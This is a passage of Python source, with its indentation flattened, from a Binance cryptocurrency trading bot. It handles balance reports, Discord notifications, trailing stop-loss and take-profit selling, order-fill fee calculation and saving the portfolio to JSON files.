discord_mode = "Test"
font = f'{txcolors.ENDC}{txcolors.YELLOW}{txcolors.BOLD}{txcolors.UNDERLINE}'
extsigs = ""
try:
for module in SIGNALLING_MODULES:
if extsigs == "":
extsigs = module
else:
extsigs = extsigs + ', ' + module
except Exception as e:
pass
if extsigs == "":
extsigs = "No external signals running"
print(f'')
print(f'--------')
print(f"STARTED : {str(bot_started_datetime).split('.')[0]} | Running for: {str(datetime.now() - bot_started_datetime).split('.')[0]}")
print(f'CURRENT HOLDS : {len(coins_bought)}/{TRADE_SLOTS} ({float(CURRENT_EXPOSURE):g}/{float(INVESTMENT_TOTAL):g} {PAIR_WITH})')
if REINVEST_PROFITS:
print(f'ADJ TRADE TOTAL : {TRADE_TOTAL:.2f} (Current TRADE TOTAL adjusted to reinvest profits)')
print(f'BUYING MODE : {font if mode == "Live (REAL MONEY)" else txcolors.DEFAULT}{mode}{txcolors.DEFAULT}{txcolors.ENDC}')
print(f'Buying Paused : {bot_paused}')
print(f'')
print(f'SESSION PROFIT (Inc Fees)')
print(f'Realised : {txcolors.SELL_PROFIT if session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{session_profit_incfees_perc:.4f}% Est:${session_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
print(f'Unrealised : {txcolors.SELL_PROFIT if unrealised_session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{unrealised_session_profit_incfees_perc:.4f}% Est:${unrealised_session_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
print(f' Total : {txcolors.SELL_PROFIT if (session_profit_incfees_perc + unrealised_session_profit_incfees_perc) > 0. else txcolors.SELL_LOSS}{session_profit_incfees_perc + unrealised_session_profit_incfees_perc:.4f}% Est:${session_profit_incfees_total+unrealised_session_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
print(f'')
print(f'ALL TIME DATA :')
print(f"Market Profit : {txcolors.SELL_PROFIT if market_profit > 0. else txcolors.SELL_LOSS}{market_profit:.4f}% (BTCUSDT Since STARTED){txcolors.DEFAULT}")
print(f'Bot Profit : {txcolors.SELL_PROFIT if historic_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{historic_profit_incfees_perc:.4f}% Est:${historic_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
print(f'Completed Trades: {trade_wins+trade_losses} (Wins:{trade_wins} Losses:{trade_losses})')
print(f'Win Ratio : {float(WIN_LOSS_PERCENT):g}%')
print(f'')
print(f'External Signals: {extsigs}')
print(f'--------')
print(f'')
#msg1 = str(bot_started_datetime) + " | " + str(datetime.now() - bot_started_datetime)
msg1 = str(datetime.now()).split('.')[0]
msg2 = " | " + str(len(coins_bought)) + "/" + str(TRADE_SLOTS) + " | PBOT: " + str(bot_paused) + " | MODE: " + str(discord_mode)
msg2 = msg2 + ' SPR%: ' + str(round(session_profit_incfees_perc,2)) + ' SPR$: ' + str(round(session_profit_incfees_total,4))
msg2 = msg2 + ' SPU%: ' + str(round(unrealised_session_profit_incfees_perc,2)) + ' SPU$: ' + str(round(unrealised_session_profit_incfees_total,4))
msg2 = msg2 + ' SPT%: ' + str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,2)) + ' SPT$: ' + str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,4))
msg2 = msg2 + ' ATP%: ' + str(round(historic_profit_incfees_perc,2)) + ' ATP$: ' + str(round(historic_profit_incfees_total,4))
msg2 = msg2 + ' CTT: ' + str(trade_wins+trade_losses) + ' CTW: ' + str(trade_wins) + ' CTL: ' + str(trade_losses) + ' CTWR%: ' + str(round(WIN_LOSS_PERCENT,2))
msg_discord_balance(msg1, msg2)
history_log(session_profit_incfees_perc, session_profit_incfees_total, unrealised_session_profit_incfees_perc, unrealised_session_profit_incfees_total, session_profit_incfees_perc + unrealised_session_profit_incfees_perc, session_profit_incfees_total+unrealised_session_profit_incfees_total, historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins+trade_losses, trade_wins, trade_losses, WIN_LOSS_PERCENT)
return msg1 + msg2
def history_log(sess_profit_perc, sess_profit, sess_profit_perc_unreal, sess_profit_unreal, sess_profit_perc_total, sess_profit_total, alltime_profit_perc, alltime_profit, total_trades, won_trades, lost_trades, winloss_ratio):
global last_history_log_date
time_between_insertion = datetime.now() - last_history_log_date
# only log balance to log file once every 60 seconds
if time_between_insertion.seconds > 60:
last_history_log_date = datetime.now()
timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
if not os.path.exists(HISTORY_LOG_FILE):
with open(HISTORY_LOG_FILE,'a+') as f:
f.write('Datetime\tCoins Holding\tTrade Slots\tPausebot Active\tSession Profit %\tSession Profit $\tSession Profit Unrealised %\tSession Profit Unrealised $\tSession Profit Total %\tSession Profit Total $\tAll Time Profit %\tAll Time Profit $\tTotal Trades\tWon Trades\tLost Trades\tWin Loss Ratio\n')
with open(HISTORY_LOG_FILE,'a+') as f:
f.write(f'{timestamp}\t{len(coins_bought)}\t{TRADE_SLOTS}\t{str(bot_paused)}\t{str(round(sess_profit_perc,2))}\t{str(round(sess_profit,4))}\t{str(round(sess_profit_perc_unreal,2))}\t{str(round(sess_profit_unreal,4))}\t{str(round(sess_profit_perc_total,2))}\t{str(round(sess_profit_total,4))}\t{str(round(alltime_profit_perc,2))}\t{str(round(alltime_profit,4))}\t{str(total_trades)}\t{str(won_trades)}\t{str(lost_trades)}\t{str(winloss_ratio)}\n')
def msg_discord_balance(msg1, msg2):
global last_msg_discord_balance_date, discord_msg_balance_data
time_between_insertion = datetime.now() - last_msg_discord_balance_date
# only put the balance message to discord once every 60 seconds and if the balance information has changed since last times
if time_between_insertion.seconds > 60:
if msg2 != discord_msg_balance_data:
msg_discord(msg1 + msg2)
discord_msg_balance_data = msg2
else:
# ping msg to know the bot is still running
msg_discord(".")
def msg_discord(msg):
message = msg + '\n\n'
if MSG_DISCORD:
#Webhook of my channel. Click on edit channel --> Webhooks --> Creates webhook
mUrl = "https://discordapp.com/api/webhooks/"+DISCORD_WEBHOOK
data = {"content": message}
response = requests.post(mUrl, json=data)
#BB
# print(response.content)
def pause_bot():
'''Pause the script when external indicators detect a bearish trend in the market'''
global bot_paused, session_profit_incfees_perc, hsp_head, session_profit_incfees_total
# start counting for how long the bot has been paused
start_time = time.perf_counter()
while os.path.exists("signals/pausebot.pause"):
# do NOT accept any external signals to buy while in pausebot mode
remove_external_signals('buy')
if bot_paused == False:
print(f'{txcolors.WARNING}Buying paused due to negative market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT. Buying paused due to negative market conditions, stop loss and take profit will continue to work.'
msg_discord(msg)
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
last_price = get_price(True)
# pausing here
if hsp_head == 1:
# print(f'Paused...Session profit: {session_profit_incfees_perc:.2f}% Est: ${session_profit_incfees_total:.{decimals()}f} {PAIR_WITH}')
balance_report(last_price)
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and ser pause_bot to False
if bot_paused == True:
print(f'{txcolors.WARNING}Resuming buying due to positive market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT. Resuming buying due to positive market conditions, total sleep time: ' + str(time_elapsed)
msg_discord(msg)
bot_paused = False
return
def convert_volume():
'''Converts the volume given in TRADE_TOTAL from USDT to the each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except:
pass
# calculate the volume in coin from TRADE_TOTAL in PAIR_WITH (default)
volume[coin] = float(TRADE_TOTAL / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
# original code: volume[coin] = float('{:.1f}'.format(volume[coin]))
volume[coin] = int(volume[coin])
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
#volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
volume[coin] = truncate(volume[coin], lot_size[coin])
return volume, last_price
def buy():
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
for coin in volume:
if coin not in coins_bought:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} of {coin} @ ${last_price[coin]['price']}{txcolors.DEFAULT}")
msg1 = str(datetime.now()) + ' | BUY: ' + coin + '. V:' + str(volume[coin]) + ' P$:' + str(last_price[coin]['price'])
msg_discord(msg1)
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
#if LOG_TRADES:
write_log(f"\tBuy\t{coin}\t{volume[coin]}\t{last_price[coin]['price']}\t{PAIR_WITH}")
#write_signallsell(coin.removesuffix(PAIR_WITH))
write_signallsell(rchop(coin, PAIR_WITH))
continue
# try to create a real order if the test orders did not raise an exception
try:
order_details = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(f'buy() exception: {e}')
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
if not TEST_MODE:
orders[coin] = extract_order_data(order_details)
write_log(f"\tBuy\t{coin}\t{orders[coin]['volume']}\t{orders[coin]['avgPrice']}\t{PAIR_WITH}")
else:
write_log(f"\tBuy\t{coin}\t{volume[coin]}\t{last_price[coin]['price']}\t{PAIR_WITH}")
write_signallsell(coin)
else:
print(f'Signal detected, but there is already an active trade on {coin}')
return orders, last_price, volume
def sell_coins(tpsl_override = False, specific_coin_to_sell = ""):
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit_incfees_perc, session_profit_incfees_total, coin_order_id, trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total, sell_all_coins, sell_specific_coin
global TRADE_TOTAL
externals = sell_external_signals()
last_price = get_price(False) # don't populate rolling window
#last_price = get_price(add_to_historical=True) # don't populate rolling window
coins_sold = {}
BUDGET = TRADE_TOTAL * TRADE_SLOTS
# table stuff
my_table = PrettyTable()
my_table.field_names = ["Symbol", "Volume", "Bought At", "Now At", "TP %", "SL %", "Change %", "Profit $", "Time Held"]
my_table.align["Symbol"] = "l"
my_table.align["Volume"] = "r"
my_table.align["Bought At"] = "r"
my_table.align["Now At"] = "r"
my_table.align["TP %"] = "r"
my_table.align["SL %"] = "r"
my_table.align["Change %"] = "r"
my_table.align["Profit $"] = "r"
my_table.align["Time Held"] = "l"
for coin in list(coins_bought):
if sell_specific_coin and not specific_coin_to_sell == coin:
continue
#time_held = timedelta(seconds=datetime.now().timestamp()-coins_bought[coin]['timestamp'])
time_held = timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10]))
#if HODLMODE_ENABLED and (time_held >= HODLMODE_TIME_THRESHOLD):
# move_coin_to_hodl(coin)
# continue
LastPrice = float(last_price[coin]['price'])
sellFee = (LastPrice * (TRADING_FEE/100))
sellFeeTotal = (coins_bought[coin]['volume'] * LastPrice) * (TRADING_FEE/100)
LastPriceLessFees = LastPrice - sellFee
BuyPrice = float(coins_bought[coin]['bought_at'])
buyFee = (BuyPrice * (TRADING_FEE/100))
buyFeeTotal = (coins_bought[coin]['volume'] * BuyPrice) * (TRADING_FEE/100)
BuyPricePlusFees = BuyPrice + buyFee
ProfitAfterFees = LastPriceLessFees - BuyPricePlusFees
PriceChange_Perc = float((LastPrice - BuyPrice) / BuyPrice * 100)
#PriceChangeIncFees_Perc = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
PriceChangeIncFees_Perc = float(((LastPriceLessFees - BuyPricePlusFees) / BuyPricePlusFees) * 100)
#PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
PriceChangeIncFees_Unit = float(LastPriceLessFees - BuyPricePlusFees)
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['take_profit']) / 100))
SL = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['stop_loss']) / 100))
# check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
#if LastPrice > TP and USE_TRAILING_STOP_LOSS and not sell_all_coins and not tpsl_override:
if LastPriceLessFees > TP and USE_TRAILING_STOP_LOSS and not sell_all_coins and not tpsl_override and not sell_specific_coin:
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
#if PriceChange_Perc >= 0.8:
if PriceChangeIncFees_Perc >= 0.8:
# price has changed by 0.8% or greater, a big change. Make the STOP LOSS trail closely to the TAKE PROFIT
# so you don't lose this increase in price if it falls back
#coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
coins_bought[coin]['take_profit'] = PriceChangeIncFees_Perc + TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
else:
# price has changed by less than 0.8%, a small change. Make the STOP LOSS trail loosely to the TAKE PROFIT
# so you don't get stopped out of the trade prematurely
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
#coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
coins_bought[coin]['take_profit'] = PriceChangeIncFees_Perc + TRAILING_TAKE_PROFIT
# we've got a negative stop loss - not good, we don't want this.
if coins_bought[coin]['stop_loss'] <= 0:
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] * .25
#if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.{decimals()}f} and SL {coins_bought[coin]['stop_loss']:.{decimals()}f} accordingly to lock-in profit")
my_table.add_row([f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coin + ' TP up!'}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['volume']:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{BuyPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{LastPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['take_profit']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['stop_loss']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
sellCoin = False
sell_reason = ""
if SELL_ON_SIGNAL_ONLY:
# only sell if told to by external signal
if coin in externals:
sellCoin = True
sell_reason = 'External Sell Signal'
else:
#if LastPrice < SL:
if LastPriceLessFees < SL:
sellCoin = True
if USE_TRAILING_STOP_LOSS:
#if PriceChange_Perc >= 0:PriceChangeIncFees_Perc
if PriceChangeIncFees_Perc >= 0:
sell_reason = "TTP " + str(SL) + " reached"
else:
sell_reason = "TSL " + str(SL) + " reached"
else:
sell_reason = "SL " + str(SL) + " reached"
sell_reason = sell_reason
#if LastPrice > TP:
if LastPriceLessFees > TP:
sellCoin = True
sell_reason = "TP " + str(TP) + " reached"
if coin in externals:
sellCoin = True
sell_reason = 'External Sell Signal'
if sell_all_coins:
sellCoin = True
sell_reason = 'Sell All Coins'
if sell_specific_coin:
sellCoin = True
sell_reason = 'Sell Specific Coin'
if tpsl_override:
sellCoin = True
sell_reason = session_tpsl_override_msg
if sellCoin:
print(f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}Sell: {coins_bought[coin]['volume']} of {coin} | {sell_reason} | ${float(LastPrice):g} - ${float(BuyPrice):g} | Profit: {PriceChangeIncFees_Perc:.2f}% Est: {((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH} (Inc Fees){txcolors.DEFAULT}")
msg1 = str(datetime.now()) + '| SELL: ' + coin + '. R:' + sell_reason + ' P%:' + str(round(PriceChangeIncFees_Perc,2)) + ' P$:' + str(round(((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100,4))
msg_discord(msg1)
# try to create a real order
try:
if not TEST_MODE:
#lot_size = coins_bought[coin]['step_size']
#if lot_size == 0:
# lot_size = 1
#lot_size = lot_size.index('1') - 1
#if lot_size < 0:
# lot_size = 0
order_details = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
#if repr(e).upper() == "APIERROR(CODE=-1111): PRECISION IS OVER THE MAXIMUM DEFINED FOR THIS ASSET.":
print(f"sell_coins() Exception occured on selling the coin! Coin: {coin}\nSell Volume coins_bought: {coins_bought[coin]['volume']}\nPrice:{LastPrice}\nException: {e}")
# run the else block if coin has been sold and create a dict for each coin sold
else:
if not TEST_MODE:
coins_sold[coin] = extract_order_data(order_details)
LastPrice = coins_sold[coin]['avgPrice']
sellFee = coins_sold[coin]['tradeFeeUnit']
coins_sold[coin]['orderid'] = coins_bought[coin]['orderid']
priceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# update this from the actual Binance sale information
#PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
PriceChangeIncFees_Unit = float((LastPrice-sellFee) - (BuyPrice+buyFee))
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
if DEBUG:
print(f"sell_coins() | Coin: {coin} | Sell Volume: {coins_bought[coin]['volume']} | Price:{LastPrice}")
# Log trade
#BB profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume']) * (1-(buyFee + sellFeeTotal))
profit_incfees_total = coins_sold[coin]['volume'] * PriceChangeIncFees_Unit
#write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit_incfees_total:.{decimals()}f} {PAIR_WITH} ({PriceChange_Perc:.2f}%)")
#write_log(f"\tSell\t{coin}\t{coins_sold[coin]['volume']}\t{BuyPrice}\t{PAIR_WITH}\t{LastPrice}\t{profit_incfees_total:.{decimals()}f}\t{PriceChange_Perc:.2f}\t{sell_reason}")
write_log(f"\tSell\t{coin}\t{coins_sold[coin]['volume']}\t{BuyPrice}\t{PAIR_WITH}\t{LastPrice}\t{profit_incfees_total:.{decimals()}f}\t{PriceChangeIncFees_Perc:.2f}\t{sell_reason}")
#reinvest profits
if REINVEST_PROFITS:
TRADE_TOTAL += (profit_incfees_total / TRADE_SLOTS)
#this is good
session_profit_incfees_total = session_profit_incfees_total + profit_incfees_total
session_profit_incfees_perc = session_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
historic_profit_incfees_total = historic_profit_incfees_total + profit_incfees_total
historic_profit_incfees_perc = historic_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
#TRADE_TOTAL*PriceChangeIncFees_Perc)/100
#if (LastPrice+sellFee) >= (BuyPrice+buyFee):
if (LastPrice-sellFee) >= (BuyPrice+buyFee):
trade_wins += 1
else:
trade_losses += 1
update_bot_stats()
if not sell_all_coins and not sell_specific_coin:
# within sell_all_coins, it will print display to screen
balance_report(last_price)
# sometimes get "rate limited" errors from Binance if we try to sell too many coins at once
# so wait 1 second in between sells
time.sleep(1)
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
#print(f"Holding: {coins_bought[coin]['volume']} of {coin} | {LastPrice} - {BuyPrice} | Profit: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}% Est: ({((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH}){txcolors.DEFAULT}")
my_table.add_row([f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coin}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['volume']:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{BuyPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{LastPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['take_profit']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['stop_loss']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
my_table.sortby = 'Change %'
#my_table.reversesort = True
if len(coins_bought) == 0:
if hsp_head == 1:
print(f"No trade slots are currently in use")
else:
if len(my_table._rows) > 0: print_table(my_table)
# if tpsl_override: is_bot_running = False
return coins_sold
def extract_order_data(order_details):
global TRADING_FEE, STOP_LOSS, TAKE_PROFIT
transactionInfo = {}
# This code is from GoranJovic - thank you!
#
# adding order fill extractions here
#
# just to explain what I am doing here:
# Market orders are not always filled at one price, we need to find the averages of all 'parts' (fills) of this order.
#
# reset other variables to 0 before use
FILLS_TOTAL = 0
FILLS_QTY = 0
FILLS_FEE = 0
BNB_WARNING = 0
# loop through each 'fill':
for fills in order_details['fills']:
FILL_PRICE = float(fills['price'])
FILL_QTY = float(fills['qty'])
FILLS_FEE += float(fills['commission'])
# check if the fee was in BNB. If not, log a nice warning:
if (fills['commissionAsset'] != 'BNB') and (TRADING_FEE == 0.075) and (BNB_WARNING == 0):
print(f"WARNING: BNB not used for trading fee, please enable it in Binance!")
BNB_WARNING += 1
# quantity of fills * price
FILLS_TOTAL += (FILL_PRICE * FILL_QTY)
# add to running total of fills quantity
FILLS_QTY += FILL_QTY
# increase fills array index by 1
# calculate average fill price:
FILL_AVG = (FILLS_TOTAL / FILLS_QTY)
#tradeFeeApprox = (float(FILLS_QTY) * float(FILL_AVG)) * (TRADING_FEE/100)
# Olorin Sledge: I only want fee at the unit level, not the total level
tradeFeeApprox = float(FILL_AVG) * (TRADING_FEE/100)
# the volume size is sometimes outside of precision, correct it
try:
info = client.get_symbol_info(order_details['symbol'])
step_size = info['filters'][2]['stepSize']
lot_size = step_size.index('1') - 1
if lot_size <= 0:
FILLS_QTY = int(FILLS_QTY)
else:
FILLS_QTY = truncate(FILLS_QTY, lot_size)
except Exception as e:
print(f"extract_order_data(): Exception getting coin {order_details['symbol']} step size! Exception: {e}")
# create object with received data from Binance
transactionInfo = {
'symbol': order_details['symbol'],
'orderId': order_details['orderId'],
'timestamp': order_details['transactTime'],
'avgPrice': float(FILL_AVG),
'volume': float(FILLS_QTY),
'tradeFeeBNB': float(FILLS_FEE),
'tradeFeeUnit': tradeFeeApprox,
}
return transactionInfo
def check_total_session_profit(coins_bought, last_price):
global is_bot_running, session_tpsl_override_msg
unrealised_session_profit_incfees_total = 0
BUDGET = TRADE_SLOTS * TRADE_TOTAL
for coin in list(coins_bought):
LastPrice = float(last_price[coin]['price'])
sellFee = (LastPrice * (TRADING_FEE/100))
BuyPrice = float(coins_bought[coin]['bought_at'])
buyFee = (BuyPrice * (TRADING_FEE/100))
#PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
PriceChangeIncFees_Total = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_Total)
allsession_profits_perc = session_profit_incfees_perc + ((unrealised_session_profit_incfees_total / BUDGET) * 100)
if DEBUG: print(f'Session Override SL Feature: ASPP={allsession_profits_perc} STP {SESSION_TAKE_PROFIT} SSL {SESSION_STOP_LOSS}')
if allsession_profits_perc >= float(SESSION_TAKE_PROFIT):
session_tpsl_override_msg = "Session TP Override target of " + str(SESSION_TAKE_PROFIT) + f"% met. Sell all coins now! Session profit is {allsession_profits_perc}%"
is_bot_running = False
if allsession_profits_perc <= float(SESSION_STOP_LOSS):
session_tpsl_override_msg = "Session SL Override target of " + str(SESSION_STOP_LOSS) + f"% met. Sell all coins now! Session loss is {allsession_profits_perc}%"
is_bot_running = False
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
# print(orders)
for coin in orders:
try:
coin_step_size = float(next(
filter(lambda f: f['filterType'] == 'LOT_SIZE', client.get_symbol_info(orders[coin][0]['symbol'])['filters'])
)['stepSize'])
except Exception as ExStepSize:
coin_step_size = .1
if not TEST_MODE:
coins_bought[coin] = {
'symbol': orders[coin]['symbol'],
'orderid': orders[coin]['orderId'],
'timestamp': orders[coin]['timestamp'],
'bought_at': orders[coin]['avgPrice'],
'volume': orders[coin]['volume'],
'volume_debug': volume[coin],
'buyFeeBNB': orders[coin]['tradeFeeBNB'],
'buyFee': orders[coin]['tradeFeeUnit'] * orders[coin]['volume'],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
'step_size': float(coin_step_size),
}
print(f'Order for {orders[coin]["symbol"]} with ID {orders[coin]["orderId"]} placed and saved to file.')
else:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
'step_size': float(coin_step_size),
}
print(f'Order for {orders[coin][0]["symbol"]} with ID {orders[coin][0]["orderId"]} placed and saved to file.')
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def update_bot_stats():
global trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total
bot_stats = {
'total_capital' : TRADE_SLOTS * TRADE_TOTAL,
'botstart_datetime' : str(bot_started_datetime),
'historicProfitIncFees_Percent': historic_profit_incfees_perc,
'historicProfitIncFees_Total': historic_profit_incfees_total,
'tradeWins': trade_wins,
'tradeLosses': trade_losses,
'market_startprice': market_startprice
}
#save session info for through session portability
with open(bot_stats_file_path, 'w') as file:
json.dump(bot_stats, file, indent=4)
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
# code below created by getsec <3
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
if os.path.exists('signalsell_tickers.txt'):
os.remove('signalsell_tickers.txt')
for coin in coins_bought:
#write_signallsell(coin.removesuffix(PAIR_WITH))
write_signallsell(rchop(coin, PAIR_WITH))
def write_log(logline):
timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
if not os.path.exists(LOG_FILE):
with open(LOG_FILE,'a+') as f:
f.write('Datetime\tType\tCoin\tVolume\tBuy Price\tCurrency\tSell Price\tProfit $\tProfit %\tSell Reason\n')
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
def write_signallsell(symbol):
with open('signalsell_tickers.txt','a+') as f:
f.write(f'{symbol}\n')
def remove_external_signals(fileext):
signals = glob.glob(f'signals/*.{fileext}')
for filename in signals:
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
def sell_all(msgreason, session_tspl_ovr = False):
global sell_all_coins
